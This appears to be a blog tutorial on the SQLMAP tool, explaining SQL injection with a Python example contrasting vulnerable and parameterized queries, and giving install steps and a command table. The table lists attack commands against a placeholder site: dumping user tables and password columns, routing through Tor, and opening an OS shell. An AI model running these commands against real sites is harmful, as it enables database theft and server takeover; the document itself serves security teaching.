
SQLMAP: How to test your site for SQL vulnerabilities

In the field of ethical hacking, SQLMAP is the predominant tool for finding vulnerabilities based on SQL injection. It is an open source solution written in Python that automates the process of finding and exploiting SQL vulnerabilities, with the ultimate goal of fully controlling the database and the server on which it resides.


It includes several functions such as database fingerprinting, data collection and command execution on the operating system. The SQLMAP tool can be used for the following purposes:

  • Checking a web application for a SQL injection vulnerability
  • Exploiting a SQL injection vulnerability
  • Extracting data from the database and its users
  • Bypassing the Web Application Firewall (WAF)
  • Taking full control of the underlying operating system

Some of the most important features of SQLMAP are shown below:

  • It supports the MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird and Sybase database systems.
  • It also supports 6 different SQL injection techniques: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
  • It supports recovering hashed passwords using the dictionary attack technique.
  • It allows enumeration of users, hashed passwords, roles, permissions, databases, tables and columns.

What is SQL injection?

SQL injection is a hacking technique where the attacker, by modifying the URL or some other input field of the web application, can pass SQL commands directly to the database. This bypasses the application's security controls, and as a result the attacker can extract data from the entire database, modify it and even delete it.

It is one of the oldest and most dangerous attacks on web applications. OWASP (Open Web Application Security Project) ranks injection threats at number one on the list of Top 10 Web Application Security Threats (OWASP Top 10).
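
The flaw described above, and its fix, shown as an added example that is not part of the original article. The table, rows, function names and the crafted input are all constructed for illustration; it uses an in-memory SQLite database so it can be run offline.

```python
import sqlite3

def make_db():
    """Throwaway in-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "constructed-hash-1"), ("alice", "constructed-hash-2")],
    )
    return db

def find_user_vulnerable(db, username):
    # VULNERABLE: the input is pasted into the SQL text, so a quote in
    # `username` ends the string literal and the rest is parsed as SQL.
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in db.execute(query)]

def find_user_safe(db, username):
    # HARDENED: the placeholder sends the input as a bound value; the
    # database never parses it as SQL, whatever characters it contains.
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in db.execute(query, (username,))]

def only_exact_matches(lookup, db, value):
    """Regression check for a test suite: every returned name must equal the input."""
    return all(name == value for name in lookup(db, value))

if __name__ == "__main__":
    db = make_db()
    crafted = "nobody' OR '1'='1"  # constructed input; matches no real user
    print("vulnerable, normal input :", find_user_vulnerable(db, "alice"))
    print("vulnerable, crafted input:", find_user_vulnerable(db, crafted))
    print("safe, crafted input      :", find_user_safe(db, crafted))
    print("vulnerable passes check  :", only_exact_matches(find_user_vulnerable, db, crafted))
    print("safe passes check        :", only_exact_matches(find_user_safe, db, crafted))
```

The concatenated query returns every row for the crafted input, while the parameterized query returns none. This is the difference a scanner such as SQLMAP detects, and binding parameters is what removes it.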

How to use it

SQLMAP is available for the Windows, Linux and Mac operating systems. You will find it pre-installed on Kali Linux, the Linux distro for penetration testing.

Windows 

The first step you should take is to download (if you don't already have it) the Python interpreter; remember that the tool is written in Python. You can download the latest version from here (v 3.8.0).

After you have successfully completed the python installation, follow these steps:

  1. Download the zip file from the SQLMAP website.
  2. Unzip the folder and its contents to the desired location.
  3. Open a cmd console and navigate to the location where you unzipped the folder in the previous step.
  4. Run the sqlmap.py command to see all your options.
  5. You are ready.


Linux

In almost all Linux distros Python is installed by default. If you're not sure, open a terminal and type python --version. If Python is installed, the command will show you the version.


Then run the following commands to complete the installation of the tool:

sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py

The last command will display the sqlmap banner and its usage message on the screen.

How to use it

Here are some basic commands you can use with SQLMAP and their description:

| Command | Description |
|---|---|
| sqlmap -u "http://site.com/login.php" | Simple check for a specific URL |
| sqlmap -u "http://site.com/login.php" --tor --tor-type=SOCKS5 | Check using Tor |
| sqlmap -u "http://site.com/login.php" --time-sec 20 | Check with the DBMS response delay set to 20 seconds |
| sqlmap -u "http://site.com/login.php" --dbs | Return all databases of a web application |
| sqlmap -u "http://site.com/login.php" -D site_db --tables | Return the tables of a specific database |
| sqlmap -u "http://site.com/login.php" -D site_db -T users --dump | Return the contents of a particular table |
| sqlmap -u "http://site.com/login.php" -D site_db -T users --columns | Return all columns in a table |
| sqlmap -u "http://site.com/login.php" -D site_db -T users -C username,password --dump | Return the contents of specific columns |
| sqlmap -u "http://site.com/login.php" --method "POST" --data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users --dump | Return a table when we have the admin login information |
| sqlmap --dbms=mysql -u "http://site.com/login.php" --os-shell | Return an OS shell |
| sqlmap --dbms=mysql -u "http://site.com/login.php" --sql-shell | Return an SQL shell |

You can find a more detailed cheat sheet for SQLMAP here.

We look forward to your comments ...

stormi
Here's the crazy ones, the misfits, the rebels, the troublemakers ...